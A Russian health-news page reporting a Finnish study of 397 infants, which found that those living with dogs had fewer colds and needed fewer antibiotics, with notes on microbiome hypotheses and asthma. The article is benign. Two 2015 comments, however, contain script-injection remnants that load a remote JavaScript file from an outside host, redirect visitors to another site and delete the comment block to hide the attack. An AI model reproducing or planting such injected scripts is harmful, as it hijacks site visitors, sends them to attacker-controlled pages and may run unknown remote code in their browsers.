Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Если в доме есть собака, ...  >>  Если в доме есть собака, дети болеют реже!
 
Обратная связь
 

Если в доме есть собака, дети болеют реже!

Размер шрифта
24 августа 2012 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Если в доме есть собака, то дети первого года жизни болеют реже, чем дети, которые живут с кошками или вообще без животных. Этому нашли объяснение финские ученые.

Суть исследования

В исследовании приняли участие 397 детей. Наблюдение за детьми начиналось на этапе плода, в третьем триместре беременности, и продолжалось в течение первого года жизни. Каждую неделю родители заполняли специальный дневник, в который вносили подробную информацию о состоянии здоровья своих детей и их общении с кошками и собаками.

После того как ученые проанализировали дневники, оказалось, что по сравнению с детьми, у которых не было домашних животных, дети, проживающие с собаками, реже болели простудными заболеваниями, и им требовалось меньше антибиотиков.

Чем хороши собаки

Почему дети, проживающие в одном доме с собаками, болеют реже до конца неизвестно. Существует проверенная временем гипотеза, согласно которой иммунная система ребенка развивается лучше, если ребенок подвергается воздействию микроорганизмов в умеренных количествах. Слишком большое количество микробов точно так же, как и их полное отсутствие, неблагоприятно для ребенка.

На основе представленной гипотезы родилась другая гипотеза. Ее суть заключается в том, что различные микробы, с которыми встречается ребенок в первый год своей жизни, воздействуют на микрофлору кишечника, защищая ребенка как от развития аутоиммунных заболеваний, так и от аллергических реакций.  

Следует отметить, что с течением времени первая гипотеза претерпела некоторые изменения. На данный момент считается, что воздействие определенного количества микроорганизмов недостаточно: необходимо воздействие бактерий и вирусов, которые изменяют микрофлору кишечника, защищая ребенка от аллергических реакций и инфекций.

Собаки не для всех

Родители должны помнить, что не все дети могут жить с собаками: одних детей присутствие собаки в доме защищает от инфекций и аллергических реакций, а других детей – нет. Хуже всего, когда ребенок часто болеет или страдает бронхиальной астмой, а родители приносят собаку в дом в надежде, что это поможет сделать малыша более здоровым. Ребенок, страдающий бронхиальной астмой, ни в коем случае не должен контактировать с собаками и другими животными. Присутствие собаки в доме действительно защищает ребенка от простудных заболеваний, но только в ранний период его жизни.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 21:32

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 23:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Подтянутые дети учатся лучше своих неспортивных сверстников   Бесчувственный язык – причина ожирения   Детское ожирение – причина рака   Приемная семья  
22 октября 2012Детское ожирение – причина рака 23 августа 2012Если в доме есть собака, дети болеют реже!
 
21 февраля 2013Подтянутые дети учатся лучше своих неспортивных сверстников 06 ноября 2012Подростки не могут побороть страх
 

Слайдшоу

1
Как вы убиваете своих детей
Детские болезни, которые должна знать каждая мама. Часть 1
Как кормить малыша

Тесты

1
Что вы знаете о грудном вскармливании?
Что вы знаете об СДВГ?
Как контролировать бронхиальную астму у детей
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.